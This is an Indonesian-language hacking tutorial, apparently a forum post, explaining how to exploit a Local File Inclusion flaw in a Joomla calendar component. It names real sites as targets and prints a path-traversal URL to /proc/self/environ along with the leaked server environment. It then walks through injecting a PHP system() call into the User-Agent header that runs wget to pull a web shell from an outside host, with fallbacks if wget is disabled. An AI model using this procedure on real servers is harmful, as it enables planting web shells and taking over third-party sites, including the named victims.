OK.. w Coba Jelasin Cara Ini Kalo Salah Benerin Ya..
:D
LFI : LOCAL FILE INCLUDE
Bug Dimana User Dapat Menginclude Suatu File Ke Dalam File PHP.
Berikut Contoh Simpe Nya.
file xxx.php Mengandung code Berikut :
<?php include($_GET['i']); ?>
Kita Bisa Memanfaat kan nya dengan cara.
http://site.com/xxx.php?i=[File Yang Ingin Di Include]
Bila Menemukan bug Ini ada 2 cara untuk meletakan Shell Ke Dalam Server.
yaitu :
LFI to RCE (REMOTE COMMAND EXECUTION) ATAU LEWAT PROC/SELF/ENVIRON
Sebener nya Di File Proc Self Environ Itu Ada BUG RCE :D
Tapi Kalo LFI to RCE kita harus menemukan Access Log yang ada di server..
Abis Itu Kita Racun Tuh LOG nya Biar Di Log Nya Ada Bug RCE.
Jelas Nya GOOGLING aja Yah Buat LFI to RCE :D
Kembali ke topik Upload Shell Dari File proc/self/environ
Misal Kita Nemu Bug LFI ..
http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=[LFI]Dari Sini Kita Tes Ada GAg File Proc/self/environ nya.
http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00%00 --> ini NULL Karakter Jadi Misalkan ada Karakter Sesudah NULL char ini Bakal Terhapus. :D
Dari Target Di Atas dapet Dah Tuh File Proc/Self/Environ :D
DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.wofchurchke.org�HTTP_KEEP_ALIVE=300�HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)�PATH=/bin:/usr/bin:/usr/local/bin�PATH_INFO=//index.php�PHPRC=/home/content/l/e/c/leconnections/html�QUERY_STRING=option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00�RAILS_ENV=production�REDIRECT_STATUS=200�REMOTE_ADDR=206.123.88.83�REMOTE_PORT=1560�REQUEST_METHOD=GET�REQUEST_URI=//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00�SCRIPT_FILENAME=/home/content/l/e/c/leconnections/html/wof//index.php�SCRIPT_NAME=//index.php�SERVER_ADDR=208.109.181.58�SERVER_ADMIN=support@supportwebsite.com�SERVER_NAME=www.wofchurchke.org�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=
Apache/1.3.33 Server at
www.wofchurchke.org Port 80
SERVER_SOFTWARE=Apache�SPI=TRUE�SUBDOMAIN_DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html/wof�
Fatal error: Class 'GCalendarController../../../../../../../../../../../../../../../proc/self/environ' not found in /home/content/l/e/c/leconnections/html/wof/components/com_gcalendar/gcalendar.php on line 21
Dari Situ Kita inject pake Addons Tamper Data < MOZILLA >
Cari Di Google Ye "TAMPER DATA ADDON MOZILLA"
http://www.equip2conceal.com//index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00Abis Itu Pastiin Target Nya Masih %00 Di Addres Bar Mozilla
Jangan Di Enter Dolo
Aktifin Tamper Data
Tools - Tamper Data - Start Tamper
Trus Klik Address Bar & Tekan ENTER.
Nanti Muncul Jendela Baru ( TAMPER WITH REQUEST )
Hilangin Cek List "continue tampering"
Pastikan Yg Di Tamper With Request itu Target Kita.
Kalo Bukan Klik Aja Submit.
nah Kalo Uda Bner Target Kita Langsung Klik Tamper.
Nanti Muncul Jendela Baru TAMPER POPUP
Di Bagian User-Agent Isi Nya
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Hapus Bagian Itu Trus Ganti Pake
<?system('wget
http://<SHELL DALAM BENTUK TXT> -O OUTPUT.php');?>
Fungsi Nya Mengexekusi Perintah WGET yaitu
Server Nge Download
http://<SHELL TXT> Dan Output Nya OUTPUT.php
Kalo Uda ya Di Cek Lah.
Misal Target Kita
http://www.xxx.com/xxx/xxx/?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00Brarti Shell Kita Ada Di Sini
http://www.xxx.com/xxx/xxx/OUTPUT.phpPoko Nya Di Path File Yg Ada Bug LFI nya Tersebut :D
Tapi Kalo Abis Di Tamper Ternyata Shell Kita Gag Ada Brarti Target Nya Uda Di Patch
Atau Perintah WGET di Disable / SAFE MODE Pada Server ON.
Kalo Wget Di Disable Coba Pake ( LWP-DOWNLOAD / FETCH )
SEKIAN MOGA SUKSES...